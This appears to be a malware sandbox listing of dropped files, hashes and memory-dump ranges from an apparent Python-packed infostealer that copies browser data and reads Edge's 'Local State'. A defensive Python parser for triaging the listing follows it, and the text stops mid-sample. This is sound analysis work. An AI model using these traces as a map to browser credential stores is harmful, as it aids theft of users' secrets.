SHA512 93d81b849fd5366f21e218eb22bf07e09bbaa7b4cca77cc22a01586f8eb5e5f33cf2095272153ca8060c87fe5aed08e1d54ac787d88418a35fe6656c9ec14dcf

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 5416a44bafb404eae9004b1b770a3225
SHA1 90dfb5e1528069606f26328106d49be22eb2102a
SHA256 3a2cd09a02203573ac71f91a0fc35a0613de2f50151932c53383b4ad19a3dbf0
SHA512 d89f55bf2e12672632b2445d9e03f77257e7cb4f71e24d18bb541ef2529c40b5795d4e0012634b37aa5a85065b4b4a7b8d45ae32329be619a64855bc8eb0d76f

memory/5216-835-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-848-0x0000000000F70000-0x0000000000F7A000-memory.dmp

memory/5420-851-0x000000001B8B0000-0x000000001B8C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

MD5 ffe171f8f390c6e6ea900b681d8eb1ec
SHA1 0f8f3c8330bfd0d75ac29de55905886d9bb023f3
SHA256 f4c550467a2a69fd97d98aa85e62a3df99d9776d18deb5b8a2a3b7b5944f95eb
SHA512 ce5f70530e43b90d317d3ba6ed125d26baf82a2fb096b9c45196e2356fc55970bb18e29d5110c004b6375f55466dcc2e7e0305aaa4e46fb5bfc7c44bed9321b2

C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll

MD5 965408ab7d160b37ed1d8819634a6660
SHA1 30611abb15124919dab1096a517aae36c3c95ea7
SHA256 9f0566e72a2a465cb888f64dd0f9db95e84e0a762575dbd31b13c1e6bb63b3b5
SHA512 b3f0e075187b44affeb62526cfef08544072eb507d186df45a9dee9c4355d14a9590c082cca2ae1dee65786ebabec23824d772189ac5ca196b32ded80891bd8f

memory/5508-856-0x00000000031B0000-0x00000000031CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI52802\ucrtbase.dll

MD5 0e0bac3d1dcc1833eae4e3e4cf83c4ef
SHA1 4189f4459c54e69c6d3155a82524bda7549a75a6
SHA256 8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae
SHA512 a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

memory/5508-847-0x00000000744B0000-0x0000000074C60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI52802\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI52802\base_library.zip

MD5 81cd6d012885629791a9e3d9320c444e
SHA1 53268184fdbddf8909c349ed3c6701abe8884c31
SHA256 a18892e4f2f2ec0dee5714429f73a5add4e355d10a7ba51593afc730f77c51dd
SHA512 d5bf47fad8b1f5c7dcaa6bef5d4553e461f46e6c334b33d8adc93689cf89365c318f03e961a5d33994730b72dc8bde62209baca015d0d2d08a081d82df7dfd73

C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll

MD5 86e0ad6ba8a9052d1729db2c015daf1c
SHA1 48112072903fff2ec5726cca19cc09e42d6384c7
SHA256 5ecda62f6fd2822355c560412f6d90be46a7f763f0ffeec9854177904632ac2d
SHA512 5d6e32f9ff90a9a584183dad1583aea2327b4aea32184b0ebbec3df41b0b833e6bb3cd40822dd64d1033125f52255812b17e4fa0add38fcda6bab1724dfaa2eb

C:\Users\Admin\AppData\Local\Temp\_MEI52802\_ctypes.pyd

MD5 78df76aa0ff8c17edc60376724d206cd
SHA1 9818bd514d3d0fc1749b2d5ef9e4d72d781b51dd
SHA256 b75560db79ba6fb56c393a4886eedd72e60df1e2f7f870fe2e356d08155f367b
SHA512 6189c1bd56db5b7a9806960bc27742d97d2794acebc32e0a5f634fe0ff863e1775dcf90224504d5e2920a1192a3c1511fb84d41d7a2b69c67d3bdfbab2f968fa

C:\Users\Admin\AppData\Local\Temp\_MEI52802\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI52802\_bz2.pyd

MD5 afaa11704fda2ed686389080b6ffcb11
SHA1 9a9c83546c2e3b3ccf823e944d5fd07d22318a1b
SHA256 ab34b804da5b8e814b2178754d095a4e8aead77eefd3668da188769392cdb5f4
SHA512 de23bb50f1d416cf4716a5d25fe12f4b66e6226bb39e964d0de0fef1724d35b48c681809589c731d3061a97c62b4dc7b9b7dfe2978f196f2d82ccce286be8a2a

C:\Users\Admin\AppData\Local\Temp\_MEI52802\_lzma.pyd

MD5 2ae2464bfcc442083424bc05ed9be7d2
SHA1 f64b100b59713e51d90d2e016b1fe573b6507b5d
SHA256 64ba475a28781dca81180a1b8722a81893704f8d8fac0b022c846fdcf95b15b9
SHA512 6c3acd3dcae733452ad68477417693af64a7d79558e8ec9f0581289903c2412e2f29195b90e396bfdcd765337a6dea9632e4b8d936ac39b1351cd593cb12ce27

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-processthreads-l1-1-0.dll

MD5 8e6eb11588fa9625b68960a46a9b1391
SHA1 ff81f0b3562e846194d330fadf2ab12872be8245
SHA256 ae56e19da96204e7a9cdc0000f96a7ef15086a9fe1f686687cb2d6fbcb037cd6
SHA512 fdb97d1367852403245fc82cb1467942105e4d9db0de7cf13a73658905139bb9ae961044beb0a0870429a1e26fe00fc922fbd823bd43f30f825863cad2c22cea

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 8711e4075fa47880a2cb2bb3013b801a
SHA1 b7ceec13e3d943f26def4c8a93935315c8bb1ac3
SHA256 5bcc3a2d7d651bb1ecc41aa8cd171b5f2b634745e58a8503b702e43aee7cd8c6
SHA512 7370e4acb298b2e690ccd234bd6c95e81a5b870ae225bc0ad8fa80f4473a85e44acc6159502085fe664075afa940cff3de8363304b66a193ac970ced1ba60aae

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 eaf36a1ead954de087c5aa7ac4b4adad
SHA1 9dd6bc47e60ef90794a57c3a84967b3062f73c3c
SHA256 cdba9dc9af63ebd38301a2e7e52391343efeb54349fc2d9b4ee7b6bf4f9cf6eb
SHA512 1af9e60bf5c186ced5877a7fa690d9690b854faa7e6b87b0365521eafb7497fb7370ac023db344a6a92db2544b5bdc6e2744c03b10c286ebbf4f57c6ca3722cf

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-memory-l1-1-0.dll

MD5 c4098d0e952519161f4fd4846ec2b7fc
SHA1 8138ca7eb3015fc617620f05530e4d939cafbd77
SHA256 51b2103e0576b790d5f5fdacb42af5dac357f1fd37afbaaf4c462241c90694b4
SHA512 95aa4c7071bc3e3fa4db80742f587a0b80a452415c816003e894d2582832cf6eac645a26408145245d4deabe71f00eccf6adb38867206bedd5aa0a6413d241f5

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-localization-l1-2-0.dll

MD5 20ddf543a1abe7aee845de1ec1d3aa8e
SHA1 0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf
SHA256 d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8
SHA512 96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 8dfc224c610dd47c6ec95e80068b40c5
SHA1 178356b790759dc9908835e567edfb67420fbaac
SHA256 7b8c7e09030df8cdc899b9162452105f8baeb03ca847e552a57f7c81197762f2
SHA512 fe5be81bfce4a0442dd1901721f36b1e2efcdcee1fdd31d7612ad5676e6c5ae5e23e9a96b2789cb42b7b26e813347f0c02614937c561016f1563f0887e69bbee

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-interlocked-l1-1-0.dll

MD5 4f631924e3f102301dac36b514be7666
SHA1 b3740a0acdaf3fba60505a135b903e88acb48279
SHA256 e2406077621dce39984da779f4d436c534a31c5e863db1f65de5939d962157af
SHA512 56f9fb629675525cbe84a29d44105b9587a9359663085b62f3fbe3eea66451da829b1b6f888606bc79754b6b814ca4a1b215f04f301efe4db0d969187d6f76f1

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-heap-l1-1-0.dll

MD5 6168023bdb7a9ddc69042beecadbe811
SHA1 54ee35abae5173f7dc6dafc143ae329e79ec4b70
SHA256 4ea8399debe9d3ae00559d82bc99e4e26f310934d3fd1d1f61177342cf526062
SHA512 f1016797f42403bb204d4b15d75d25091c5a0ab8389061420e1e126d2214190a08f02e2862a2ae564770397e677b5bcdd2779ab948e6a3e639aa77b94d0b3f6c

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-handle-l1-1-0.dll

MD5 d584c1e0f0a0b568fce0efd728255515
SHA1 2e5ce6d4655c391f2b2f24fc207fdf0e6cd0cc2a
SHA256 3de40a35254e3e0e0c6db162155d5e79768a6664b33466bf603516f3743efb18
SHA512 c7d1489bf81e552c022493bb5a3cd95ccc81dbedaaa8fdc0048cacbd087913f90b366eeb4bf72bf4a56923541d978b80d7691d96dbbc845625f102c271072c42

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-file-l2-1-0.dll

MD5 bfffa7117fd9b1622c66d949bac3f1d7
SHA1 402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2
SHA256 1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e
SHA512 b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-file-l1-2-0.dll

MD5 bcb8b9f6606d4094270b6d9b2ed92139
SHA1 bd55e985db649eadcb444857beed397362a2ba7b
SHA256 fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118
SHA512 869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-file-l1-1-0.dll

MD5 ea00855213f278d9804105e5045e2882
SHA1 07c6141e993b21c4aa27a6c2048ba0cff4a75793
SHA256 f2f74a801f05ab014d514f0f1d0b3da50396e6506196d8beccc484cd969621a6
SHA512 b23b78b7bd4138bb213b9a33120854249308bb2cf0d136676174c3d61852a0ac362271a24955939f04813cc228cd75b3e62210382a33444165c6e20b5e0a7f24

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 f1534c43c775d2cceb86f03df4a5657d
SHA1 9ed81e2ad243965e1090523b0c915e1d1d34b9e1
SHA256 6e6bfdc656f0cf22fabba1a25a42b46120b1833d846f2008952fe39fe4e57ab2
SHA512 62919d33c7225b7b7f97faf4a59791f417037704eb970cb1cb8c50610e6b2e86052480cdba771e4fad9d06454c955f83ddb4aea2a057725385460617b48f86a7

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-debug-l1-1-0.dll

MD5 71f1d24c7659171eafef4774e5623113
SHA1 8712556b19ed9f80b9d4b6687decfeb671ad3bfe
SHA256 c45034620a5bb4a16e7dd0aff235cc695a5516a4194f4fec608b89eabd63eeef
SHA512 0a14c03365adb96a0ad539f8e8d8333c042668046cea63c0d11c75be0a228646ea5b3fbd6719c29580b8baaeb7a28dc027af3de10082c07e089cdda43d5c467a

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-datetime-l1-1-0.dll

MD5 c5e3e5df803c9a6d906f3859355298e1
SHA1 0ecd85619ee5ce0a47ff840652a7c7ef33e73cf4
SHA256 956773a969a6213f4685c21702b9ed5bd984e063cf8188acbb6d55b1d6ccbd4e
SHA512 deedef8eaac9089f0004b6814862371b276fbcc8df45ba7f87324b2354710050d22382c601ef8b4e2c5a26c8318203e589aa4caf05eb2e80e9e8c87fd863dfc9

C:\Users\Admin\AppData\Local\Temp\_MEI52802\api-ms-win-core-console-l1-1-0.dll

MD5 40ba4a99bf4911a3bca41f5e3412291f
SHA1 c9a0e81eb698a419169d462bcd04d96eaa21d278
SHA256 af0e561bb3b2a13aa5ca9dfc9bc53c852bad85075261af6ef6825e19e71483a6
SHA512 f11b98ff588c2e8a88fdd61d267aa46dc5240d8e6e2bfeea174231eda3affc90b991ff9aae80f7cea412afc54092de5857159569496d47026f8833757c455c23

memory/5508-885-0x00000000018F0000-0x00000000018FA000-memory.dmp

memory/5508-886-0x00000000031F0000-0x0000000003200000-memory.dmp

memory/5508-887-0x0000000005800000-0x0000000005892000-memory.dmp

memory/5508-888-0x0000000005E50000-0x00000000063F4000-memory.dmp

memory/4440-898-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/4440-899-0x0000015CD56B0000-0x0000015CD56C0000-memory.dmp

memory/4440-900-0x0000015CD56B0000-0x0000015CD56C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zazay2u0.n3k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4440-901-0x0000015CD5880000-0x0000015CD58A2000-memory.dmp

memory/4440-902-0x0000015CD56B0000-0x0000015CD56C0000-memory.dmp

memory/4440-905-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/4704-911-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/4704-916-0x000001DCEC280000-0x000001DCEC290000-memory.dmp

memory/4704-917-0x000001DCEC280000-0x000001DCEC290000-memory.dmp

memory/4704-918-0x000001DCEC280000-0x000001DCEC290000-memory.dmp

memory/4704-921-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5420-922-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-923-0x00000000744B0000-0x0000000074C60000-memory.dmp

memory/6088-930-0x000001E6B1860000-0x000001E6B1870000-memory.dmp

memory/6088-924-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6088-935-0x000001E6B1860000-0x000001E6B1870000-memory.dmp

memory/6088-936-0x000001E6B1860000-0x000001E6B1870000-memory.dmp

memory/6088-938-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-941-0x00000000031F0000-0x0000000003200000-memory.dmp

memory/5452-942-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5452-943-0x0000018BE86A0000-0x0000018BE86B0000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcsowjmysgs.db

MD5 37192e993c137317c011d5a34ffce7de
SHA1 a8931c7e3bbcb10897a315a85e74f677de3d3f09
SHA256 8b2ec2b5cf867a930aa00d3cf5f13c2dcbf3e706de7556c8b950e7fba9762f03
SHA512 8a7f6968d86724eb0c95d3739776e8960b453ffefd90f79711ad73f3168943015ef8e5ba2b010edac9e01f161c61f25c09df39914d845c2aa45dbdd5a4eb35f1

memory/5452-978-0x0000018BE86A0000-0x0000018BE86B0000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcsccfgfudt.db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/5452-990-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5964-996-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5476-1019-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5964-1020-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5988-1021-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6052-1066-0x00000000744B0000-0x0000000074C60000-memory.dmp

memory/5508-1076-0x000000000B450000-0x000000000C050000-memory.dmp

memory/5476-1077-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6052-1074-0x00000000056A0000-0x00000000056B0000-memory.dmp

memory/5988-1128-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/6052-1130-0x00000000744B0000-0x0000000074C60000-memory.dmp

C:\Users\Admin\AppData\Local\Tempcstibhfkeo.db

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Tempcswqljgecu.db

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Tempcswtswqnen.db

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Tempcscqggrzfo.db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/1388-1177-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1178-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1179-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1183-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1184-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1186-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1187-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1185-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1188-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/1388-1189-0x00000236DDC80000-0x00000236DDC81000-memory.dmp

memory/5508-1192-0x00000000135C0000-0x0000000014262000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe

MD5 e898826598a138f86f2aa80c0830707a
SHA1 1e912a5671f7786cc077f83146a0484e5a78729c
SHA256 df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a
SHA512 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb

memory/1388-1204-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/1388-1205-0x00000236E0ED0000-0x00000236E0ED1000-memory.dmp

memory/1388-1206-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/1388-1208-0x00007FF792460000-0x00007FF792590000-memory.dmp

memory/1388-1209-0x00007FFE81690000-0x00007FFE81E20000-memory.dmp

memory/1388-1210-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/5508-1212-0x0000000007C30000-0x0000000007C42000-memory.dmp

memory/3384-1218-0x000000000AF80000-0x000000000AF88000-memory.dmp

memory/3384-1221-0x000000000AF80000-0x000000000AF88000-memory.dmp

memory/3384-1223-0x000000000AF80000-0x000000000AF88000-memory.dmp

memory/1388-1222-0x00000236E0EB0000-0x00000236E0EB8000-memory.dmp

memory/5508-1285-0x0000000009550000-0x00000000095B6000-memory.dmp

memory/5920-1286-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/3384-1287-0x000000000B830000-0x000000000B831000-memory.dmp

memory/5920-1289-0x00007FFE63970000-0x00007FFE64431000-memory.dmp

memory/5508-1290-0x0000000007CA0000-0x0000000007CAA000-memory.dmp

memory/5508-1291-0x000000000F0B0000-0x000000000F0BA000-memory.dmp

memory/5508-1292-0x00000000031F0000-0x0000000003200000-memory.dmp

memory/5508-1293-0x0000000009E40000-0x0000000009E4C000-memory.dmp

memory/5508-1294-0x000000000A230000-0x000000000A238000-memory.dmp

C:\Users\Admin\AppData\Roaming\Gongle\aW3BX50QGZ\0z1r4qkh.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite

MD5 d224617fef6bac96c7cb6a429c09fbaf
SHA1 513d06a2f268043f04687b3f982ec456fa730ef4
SHA256 15e962975e09ca1128ec5b679f8bae5455fbabb73c5bb540e18be36b2beb47dc
SHA512 5dd258574c4fd0e46d091e5873b3d5fe155e7b6472e037eb26a89d35b5ae6c0f466950ad9811e197856ce65d44bb99a9670a496c5619623585dc0c36cd39e36b

C:\Users\Admin\AppData\Roaming\Gongle\a9OK40CWTC\LOG

MD5 da5f0fbf6410b3ddd6325047b28c6fed
SHA1 51685bea1aabfaa463e4d2c3dd79a3f7b06de85a
SHA256 a9c8217b4efaee614e92cfe2169145c87b848aecca288a6373dfd89bc0041c5a
SHA512 0f0860a2aed0f3e98bcad42e4ab6e66f07777fa6c9c72782cb3b0a7447df111209958cc6c17fa621f58c22dbb2fd534fdaa8bae43101aaffc6245baf42cb34a4

C:\Users\Admin\AppData\Roaming\Gongle\a9OK40CWTC\LOG.old

MD5 8b3ccac199f8e5728393b65ff1a9f565
SHA1 440696e1751e54b8e62f9c2959aa5ac6639130bb
SHA256 0c53d925ba929b5604618107539e640de869f89509aec4dacd6a1f4d42a77374
SHA512 e42d7310309f49daa9684895115ab651233d13d496e863d2b5e2ae4833003018757ff6b403dfec156195f93b0559789e8d82056cf0cedd6b5a4deed16a7b46d6

C:\Users\Admin\AppData\Roaming\Gongle\a0XBE78TUJ\000003.log

MD5 6267c9131ea90521623bdf69bd63818c
SHA1 13fb245bf06c70fc01fd044c5708e314925c3b4c
SHA256 bb779a837d6cff597b4796c4e341cdbce975874cf96d9db93e36a335b550eb59
SHA512 d0ebb61649cb375966fe0998ad2d283f56fce1e4cfbcc81a35cacbc4eda954219a6fd60198d13ecad51b680caa7015400c4790c2814a4562e4b89579d3fa7cf3

C:\Users\Admin\AppData\Roaming\Gongle\a0XBE78TUJ\LOG

MD5 38c43b6eefd91e77f0e10468cbf42872
SHA1 707f245135ac481749e94050a9ffc4dc82cc79be
SHA256 2e06bb5b782a1a8f7360b47edb0048b57e2c157e021555e932365fd5703cfa26
SHA512 275318ca37bf07f70269bb3f67672520ee3fe37543daa908e9da87ea461691ccac9ab3400f9437fab8fca1117738b639c0157c315a81a284dfd32241e56c6c1a

C:\Users\Admin\AppData\Roaming\Gongle\a0XBE78TUJ\LOG.old

MD5 e2b0ea245c71131290d7d99c59cd243f
SHA1 197accc7c2b93282b10df739d9e2a5b8bfa96e95
SHA256 394bebd835352f3f89f2be4a17135f97ba998d4ec15b409b41d9ca87b5289965
SHA512 27eccfea8cd3a8f77aa1018b54aad2d61fc8f25a20b8088cedc2c45136c26a0ae16ee16cf99d764a7267b301cd60a914e9b5a5348322206af23b847b653a9417

memory/5508-1427-0x000000000A240000-0x000000000A2F2000-memory.dmp

memory/5508-1428-0x000000000A340000-0x000000000A362000-memory.dmp

memory/5508-1429-0x000000000A3F0000-0x000000000A466000-memory.dmp

memory/5508-1430-0x000000000A3B0000-0x000000000A3CE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dd198d756254403b8a240b4a565e0c09

MD5 8166da8f918f2041c840d6363c798090
SHA1 4e9ac5499d32c5b86e54317f6b7efd1cef9e71c0
SHA256 049c6e9809fb1b2614578f8772ee5330d11867a84199cc1c7ab62de49b91efc9
SHA512 2d64b9412782fdd1b60625b5445772c01a7f3afc9be78c49a072b0eb5d17aa9f2495cb3debb1568a60c492f067b9cbd3f0c04b4a770cff7ace666c0c7fdb6cbe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 018a7e675163814400699d3fd4179d2a
SHA1 d52dcbcf86e2e32c6d0f3956188d41197a9057ec
SHA256 b955c566b18a8180012dd01956492828da59f429b3224d2db6ca8ba0e77ffe75
SHA512 94dded9b3c1311a3f3d597d4d312d05b49a86934a3e044f0560c878fc406d244e756ad3c3344ab1b91fcf6f66139bc6cf94af45eb21a668ee436dc832a305971

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 866b183f181b0469a641b0f77560742a
SHA1 1766a7219123bf63a2561beeaf1891d23aedf4a9
SHA256 e0896991d2b91cc5568ee127ad09c7157a0472453d47d0898c4f4ffa851d0a8f
SHA512 dfa03c223c16b7719433a0c3a34578b6ca0d863decd7478a4f9c435d225bbabd6d1ec1f4be0d285d5ebee4ab760eda97c7ed88a6b9c4d88e6390baffce2248ef
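The listing above is a flat record of dropped-file paths, their four digests, and memory-dump ranges in the form memory/PID-index-start-end. Nothing on the page turns it into something a responder can act on, so here is a small parser plus the three triage checks worth running over it: digest-length validation (catches a truncated copy-paste before a hash lands in a blocklist), the same path reported with more than one SHA256 (the file was overwritten between drops, so a single hash will not match every variant), and the same address range dumped from more than one PID (what a module mapped into several processes looks like). This is an added example, not code from the original report or the sandbox that produced it; the SAMPLE text is a constructed excerpt of entries copied from the listing above, and the line shapes (drive-letter path, blank line, then one digest per line) are assumed to be exactly as rendered here.

```python
"""Parse a sandbox "Files" listing into records and run a few triage checks.
Added example; not part of the original report. Line shapes are assumed to match
the rendering on the page (path, blank line, MD5/SHA1/SHA256/SHA512 lines,
and memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp lines)."""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
PATH_RE = re.compile(r"^[A-Za-z]:\\")                     # Windows drive-letter path
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
MEI_RE = re.compile(r"\\(_MEI\d+)\\")                     # PyInstaller onefile extraction dir

# Constructed excerpt: entries copied from the listing above, trimmed to four files
# (two pairs sharing a path) and three memory-dump lines.
SAMPLE = r"""
C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 181a5e1c1238407657c399a6195e2a0f
SHA1 ed41ca6ba40433de12c93c5b7df9b3a5c4683017
SHA256 3260ef60eb7691ebc2741e24db06c644c30709c1d93efcac521b47e51c4f2446
SHA512 e0f1ee2de2ca7fb3354affe079318b54846c9afcfba9fe25b4ef17e7dac1b2e28dc3bc481c162cd9576ef58385ef9ebba5c5870f678d37cfb2d924f71d0155b3

C:\Users\Admin\AppData\Roaming\Win (3).exe

MD5 5f8136e9c87c5cd15107a16c93b2410e
SHA1 fd76478c14937669b96185ee1a79c171a9200fd4
SHA256 a53b3cc4736d3277de809b1f29243f80e62111ee445083719f50a217cd531d94
SHA512 131c358ea431f62e697decbf92024137db22ce8a8abec2791288d70eb2158487d5648b89a809a6287755a37f467ab319dc5c0f72f30372e3954b42c32ea06c83

memory/5216-702-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
memory/5916-703-0x00007FFE63970000-0x00007FFE64431000-memory.dmp
memory/5216-704-0x00000000002E0000-0x0000000000DF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll

MD5 965408ab7d160b37ed1d8819634a6660
SHA1 30611abb15124919dab1096a517aae36c3c95ea7
SHA256 9f0566e72a2a465cb888f64dd0f9db95e84e0a762575dbd31b13c1e6bb63b3b5
SHA512 b3f0e075187b44affeb62526cfef08544072eb507d186df45a9dee9c4355d14a9590c082cca2ae1dee65786ebabec23824d772189ac5ca196b32ded80891bd8f

C:\Users\Admin\AppData\Local\Temp\_MEI52802\python311.dll

MD5 86e0ad6ba8a9052d1729db2c015daf1c
SHA1 48112072903fff2ec5726cca19cc09e42d6384c7
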